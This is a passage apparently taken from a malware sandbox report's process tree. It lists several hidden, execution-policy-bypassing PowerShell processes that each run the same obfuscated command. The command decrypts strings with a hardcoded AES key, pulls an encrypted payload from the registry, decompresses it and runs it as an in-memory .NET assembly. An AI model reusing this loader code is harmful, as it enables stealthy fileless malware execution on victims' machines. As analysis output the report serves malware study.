New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:4380
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:3728
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5292
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nZcAg);$tRwSp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nOxBSgAiHF8nfdxoj7/Nuw==');$tRwSp = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tRwSp, 0, $tRwSp.Length);$tRwSp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tRwSp);$TmiGz0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WY9vijNcPPT+fdBVZslsEg==');$TmiGz0 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz0, 0, $TmiGz0.Length);$TmiGz0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz0);$TmiGz1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UcVpaXxQUNcTpfF97euNLw==');$TmiGz1 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz1, 0, $TmiGz1.Length);$TmiGz1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz1);$TmiGz2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BsBMHusIlPucFJfz2BVUIg==');$TmiGz2 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz2, 0, $TmiGz2.Length);$TmiGz2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz2);$TmiGz3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qRIvrZmkWwVVx/Ouzjw84Q==');$TmiGz3 = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz3, 0, $TmiGz3.Length);$TmiGz3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz3);$lqXAF.Dispose();$tqbBs1.Dispose();$qgHfa = [Microsoft.Win32.Registry]::$nZcAg.$uUkBG($TmiGz).$IjeSt($CuUVN);$sqPwb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qgHfa);$tqbBs = New-Object System.Security.Cryptography.AesManaged;$tqbBs.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$oikLo = $tqbBs.('rotpyrceDetaerC'[-1..-15] -join '')();$sqPwb = $oikLo.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sqPwb, 0, $sqPwb.Length);$oikLo.Dispose();$tqbBs.Dispose();$xoVbu = New-Object System.IO.MemoryStream(, $sqPwb);$CMLFr = New-Object System.IO.MemoryStream;$eSBJN = New-Object System.IO.Compression.GZipStream($xoVbu, [IO.Compression.CompressionMode]::$TmiGz1);$eSBJN.$tRwSp($CMLFr);$eSBJN.Dispose();$xoVbu.Dispose();$CMLFr.Dispose();$sqPwb = $CMLFr.ToArray();$IUGSG = $ktyHY | IEX;$cQUzX = $IUGSG::$TmiGz2($sqPwb);$CPOzF = $cQUzX.EntryPoint;$CPOzF.$TmiGz0($null, (, [string[]] ($nzWMX)))
        5⤵
        
        PID:5368
    - - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5828).WaitForExit();[System.Threading.Thread]::Sleep(5000); $tqbBs1 = New-Object System.Security.Cryptography.AesManaged;$tqbBs1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$tqbBs1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$tqbBs1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NvmROv0v48cNKlff1onoqN7ucggBefUHgSlSEZmELU0=');$tqbBs1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BkRUiWHg3F02Eeb1c/aDw==');$lqXAF = $tqbBs1.('rotpyrceDetaerC'[-1..-15] -join '')();$TmiGz = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YW4QWmOgD+hBoMD9eVidAg==');$TmiGz = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TmiGz, 0, $TmiGz.Length);$TmiGz = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TmiGz);$CuUVN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('P6g3aiCa0hyGmCz88AetgbycN5jfqobyhmsLP3thPe0=');$CuUVN = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CuUVN, 0, $CuUVN.Length);$CuUVN = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CuUVN);$nzWMX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9+QaxjMO+xEzb6EQS2UJDA==');$nzWMX = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nzWMX, 0, $nzWMX.Length);$nzWMX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nzWMX);$ktyHY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kmTmMYjgsxuIvRcIoqeyrsNsFbY5xjg6c9vgQJRPNRHeq8xhZrWkr3mReSdisq5uy4ks5nKy6rVQnPQ5eUJvGGijSdTyoP4eSGHgDeuHM6ukQeVtPKQiavFoONNjAH9sbArAwo1AaZCGMtCx8xphOlB1XOnckKGs7Wc4qc+WV0IlSBEXAe6SbLDZWuR43saJ7nar5dOFIOFXaXjmsn2COeOlLQp7Zg10QFSdF4uPCgq00PSxxCp/U8CH5ZaFn+XuUfNbWC7D8HsZnEDpfRTQFwagFjaRg9ZhOPC9la4hZVek5GghMZBYz3iTrrOdO3EVi5qrCvOK3ON6KKCgq3rQV471acCRTAWr5SmeWd3aCVdqDertoSsHn+FWSqSvmHQkbP5qUec/eAtQDWwxsuB2+IQSIFwPwCZLeAJ4hlPXBJw=');$ktyHY = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ktyHY, 0, $ktyHY.Length);$ktyHY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ktyHY);$gEdbf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sNIFEG3omDrTHqsyb3JKCQ==');$gEdbf = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gEdbf, 0, $gEdbf.Length);$gEdbf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gEdbf);$IjeSt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spDEDe1jgv9z9z/hjyECSQ==');$IjeSt = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IjeSt, 0, $IjeSt.Length);$IjeSt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IjeSt);$uUkBG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9EP8SYOxQsrzwUM3BnGUkw==');$uUkBG = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uUkBG, 0, $uUkBG.Length);$uUkBG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uUkBG);$nZcAg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eB4nGuwoWd8In+WKB3wUtg==');$nZcAg = $lqXAF.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nZcAg, 0, $nZcAg.Length);$nZcAg = [System.Text.Encoding]::('8FTU'[-1..-4] -join 